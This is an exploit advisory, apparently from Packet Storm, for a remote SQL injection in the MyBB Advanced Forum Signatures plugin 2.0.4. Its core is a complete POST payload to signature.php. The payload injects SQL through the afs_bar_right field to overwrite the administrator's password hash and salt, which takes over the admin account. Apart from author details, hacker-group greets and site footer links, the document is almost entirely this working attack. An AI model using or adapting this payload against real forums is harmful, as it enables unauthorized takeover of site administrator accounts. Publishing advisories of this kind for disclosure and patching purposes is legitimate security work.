MyBB Advanced Forum Signatures version 2.0.4 suffers from a remote SQL injection vulnerability.
86a4f9706375df12fe1f1b80caeb3154dfe0be849757d2b916055f3b78f5177a---------------------------------------------------------------------
Exploit Title : MyBB Advanced Forum Signatures (afsignatures-2.0.4)
---------------------------------------------------------------------
Author : Mario_Vs
Date : 10/10/2011
Site : http://mariovs.pl/
@ : mario_vs[at]o2.pl
---------------------------------------------------------------------
Description >
Vendor : http://mods.mybb.com/download/advanced-forum-signatures
Tested On : Windows 7
---------------------------------------------------------------------
SQL Injection
>> signature.php
POST -> afs_html=<a+href="http://localhost/mybb"><img+src="http://localhost/mybb/signature.php?uid=1"+alt=""+/></a>&afs_bbcode=[url=http://localhost/mybb][img]http://localhost/mybb/signature.php?uid=1[/img][/url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg' WHERE `uid`='1';--
---------------------------------------------------------------------
---------------------------------------------------------------------
Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2
All users: HackinQ.pl
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed